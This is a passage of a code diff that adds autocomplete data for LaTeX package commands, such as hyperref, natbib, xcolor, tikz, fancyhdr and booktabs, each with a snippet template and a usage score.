'hyperref-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'hyperref-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'hyperref-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'hyperref-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'hyperref-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'hyperref-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'hyperref-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'hyperref-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'hyperref-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'hyperref-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'hyperref-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'hyperref-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'hyperref-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'hyperref-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'hyperref-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'hyperref-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'hyperref-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'hyperref-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'hyperref-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'hyperref-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'hyperref-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'hyperref-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'hyperref-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'hyperref-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'hyperref-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'hyperref-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'hyperref-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'hyperref-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'hyperref-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'hyperref-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'hyperref-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'hyperref-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'hyperref-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'hyperref-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'hyperref-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + ], + babel: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'babel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'babel-cmd', + score: 0.021170869458413965, + }, + ], + color: [ + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'color-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'color-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'color-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'color-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'color-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'color-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'color-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'color-cmd', + score: 0.2864294797053033, + }, + ], + xcolor: [ + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'xcolor-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xcolor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xcolor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'xcolor-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'xcolor-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'xcolor-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'xcolor-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'xcolor-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xcolor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'xcolor-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'xcolor-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xcolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'xcolor-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'xcolor-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xcolor-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xcolor-cmd', + score: 0.2864294797053033, + }, + ], + natbib: [ + { + caption: '\\citealt{}', + snippet: '\\citealt{$1}', + meta: 'natbib-cmd', + score: 0.007302105441724955, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'natbib-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'natbib-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\textsuperscript{}', + snippet: '\\textsuperscript{$1}', + meta: 'natbib-cmd', + score: 0.05216393882408519, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'natbib-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\bibname', + snippet: '\\bibname', + meta: 'natbib-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibname{}', + snippet: '\\bibname{$1}', + meta: 'natbib-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibpunct', + snippet: '\\bibpunct', + meta: 'natbib-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\bibpunct{}{}{}{}{}{}', + snippet: '\\bibpunct{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'natbib-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\bibpunct[]{}{}{}{}{}{}', + snippet: '\\bibpunct[$1]{$2}{$3}{$4}{$5}{$6}{$7}', + meta: 'natbib-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\citepalias{}', + snippet: '\\citepalias{$1}', + meta: 'natbib-cmd', + score: 0.00032712684909035603, + }, + { + caption: '\\citepalias[][]{}', + snippet: '\\citepalias[$1][$2]{$3}', + meta: 'natbib-cmd', + score: 0.00032712684909035603, + }, + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'natbib-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\citep{}', + snippet: '\\citep{$1}', + meta: 'natbib-cmd', + score: 0.2941882834697057, + }, + { + caption: '\\bibsection', + snippet: '\\bibsection', + meta: 'natbib-cmd', + score: 0.00038872734530908233, + }, + { + caption: '\\bibsection{}', + snippet: '\\bibsection{$1}', + meta: 'natbib-cmd', + score: 0.00038872734530908233, + }, + { + caption: '\\refname', + snippet: '\\refname', + meta: 'natbib-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\refname{}', + snippet: '\\refname{$1}', + meta: 'natbib-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\citealp{}', + snippet: '\\citealp{$1}', + meta: 'natbib-cmd', + score: 0.005275912376595364, + }, + { + caption: '\\citealp[]{}', + snippet: '\\citealp[$1]{$2}', + meta: 'natbib-cmd', + score: 0.005275912376595364, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'natbib-cmd', + score: 2.341195220791228, + }, + { + caption: '\\citetalias{}', + snippet: '\\citetalias{$1}', + meta: 'natbib-cmd', + score: 0.001419571355756266, + }, + { + caption: '\\bibitem{}', + snippet: '\\bibitem{$1}', + meta: 'natbib-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\bibitem[]{}', + snippet: '\\bibitem[$1]{$2}', + meta: 'natbib-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\citet{}', + snippet: '\\citet{$1}', + meta: 'natbib-cmd', + score: 0.09046048561361801, + }, + { + caption: '\\defcitealias{}{}', + snippet: '\\defcitealias{$1}{$2}', + meta: 'natbib-cmd', + score: 0.00042021825647418025, + }, + { + caption: '\\aftergroup', + snippet: '\\aftergroup', + meta: 'natbib-cmd', + score: 0.002020423627422133, + }, + { + caption: '\\setcitestyle{}', + snippet: '\\setcitestyle{$1}', + meta: 'natbib-cmd', + score: 0.0015840652870152204, + }, + { + caption: '\\citeyearpar{}', + snippet: '\\citeyearpar{$1}', + meta: 'natbib-cmd', + score: 0.001877888310324327, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'natbib-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'natbib-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\newblock', + snippet: '\\newblock', + meta: 'natbib-cmd', + score: 0.03684301726876973, + }, + { + caption: '\\newblock{}', + snippet: '\\newblock{$1}', + meta: 'natbib-cmd', + score: 0.03684301726876973, + }, + { + caption: '\\bibnumfmt', + snippet: '\\bibnumfmt', + meta: 'natbib-cmd', + score: 0.000353353600267394, + }, + { + caption: '\\citeyear{}', + snippet: '\\citeyear{$1}', + meta: 'natbib-cmd', + score: 0.01091041305836494, + }, + { + caption: '\\citeauthor{}', + snippet: '\\citeauthor{$1}', + meta: 'natbib-cmd', + score: 0.01359248786373484, + }, + ], + url: [ + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'url-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'url-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'url-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'url-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'url-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'url-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'url-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'url-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'url-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'url-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'url-cmd', + score: 3.7048287721105874e-5, + }, + ], + fontenc: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fontenc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fontenc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fontenc-cmd', + score: 0.021170869458413965, + }, + ], + tikz: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-cmd', + score: 0.2864294797053033, + }, + ], + fancyhdr: [ + { + caption: '\\lhead{}', + snippet: '\\lhead{$1}', + meta: 'fancyhdr-cmd', + score: 0.05268978171228714, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'fancyhdr-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'fancyhdr-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\fancypagestyle{}{}', + snippet: '\\fancypagestyle{$1}{$2}', + meta: 'fancyhdr-cmd', + score: 0.009430919590937878, + }, + { + caption: '\\footrule', + snippet: '\\footrule', + meta: 'fancyhdr-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\footrule{}', + snippet: '\\footrule{$1}', + meta: 'fancyhdr-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\fancyfoot[]{}', + snippet: '\\fancyfoot[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfoot{}', + snippet: '\\fancyfoot{$1}', + meta: 'fancyhdr-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfootoffset[]{}', + snippet: '\\fancyfootoffset[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\fancyfootoffset{}', + snippet: '\\fancyfootoffset{$1}', + meta: 'fancyhdr-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\footruleskip', + snippet: '\\footruleskip', + meta: 'fancyhdr-cmd', + score: 0.000830117957327721, + }, + { + caption: '\\fancyheadoffset[]{}', + snippet: '\\fancyheadoffset[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\fancyheadoffset{}', + snippet: '\\fancyheadoffset{$1}', + meta: 'fancyhdr-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\iffloatpage{}{}', + snippet: '\\iffloatpage{$1}{$2}', + meta: 'fancyhdr-cmd', + score: 6.606286310833368e-5, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'fancyhdr-cmd', + score: 0.013411641301057813, + }, + { + caption: '\\subsectionmark', + snippet: '\\subsectionmark', + meta: 'fancyhdr-cmd', + score: 3.1153423008593836e-5, + }, + { + caption: '\\footrulewidth', + snippet: '\\footrulewidth', + meta: 'fancyhdr-cmd', + score: 0.011424740897486949, + }, + { + caption: '\\fancyhfoffset[]{}', + snippet: '\\fancyhfoffset[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 3.741978601121172e-5, + }, + { + caption: '\\rhead{}', + snippet: '\\rhead{$1}', + meta: 'fancyhdr-cmd', + score: 0.022782817416731292, + }, + { + caption: '\\fancyplain{}{}', + snippet: '\\fancyplain{$1}{$2}', + meta: 'fancyhdr-cmd', + score: 0.007402339896386138, + }, + { + caption: '\\rfoot{}', + snippet: '\\rfoot{$1}', + meta: 'fancyhdr-cmd', + score: 0.013393817825547868, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fancyhdr-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\plainheadrulewidth', + snippet: '\\plainheadrulewidth', + meta: 'fancyhdr-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'fancyhdr-cmd', + score: 0.03225350148161425, + }, + { + caption: '\\lfoot{}', + snippet: '\\lfoot{$1}', + meta: 'fancyhdr-cmd', + score: 0.00789399846642229, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'fancyhdr-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'fancyhdr-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\fancyhf{}', + snippet: '\\fancyhf{$1}', + meta: 'fancyhdr-cmd', + score: 0.02314618933449356, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'fancyhdr-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\fancyhead[]{}', + snippet: '\\fancyhead[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\fancyhead{}', + snippet: '\\fancyhead{$1}', + meta: 'fancyhdr-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\nouppercase{}', + snippet: '\\nouppercase{$1}', + meta: 'fancyhdr-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\nouppercase', + snippet: '\\nouppercase', + meta: 'fancyhdr-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\headrule', + snippet: '\\headrule', + meta: 'fancyhdr-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\headrule{}', + snippet: '\\headrule{$1}', + meta: 'fancyhdr-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\chead{}', + snippet: '\\chead{$1}', + meta: 'fancyhdr-cmd', + score: 0.00755042164734884, + }, + { + caption: '\\headrulewidth', + snippet: '\\headrulewidth', + meta: 'fancyhdr-cmd', + score: 0.02268137935335823, + }, + ], + booktabs: [ + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'booktabs-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'booktabs-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'booktabs-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'booktabs-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'booktabs-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'booktabs-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'booktabs-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: 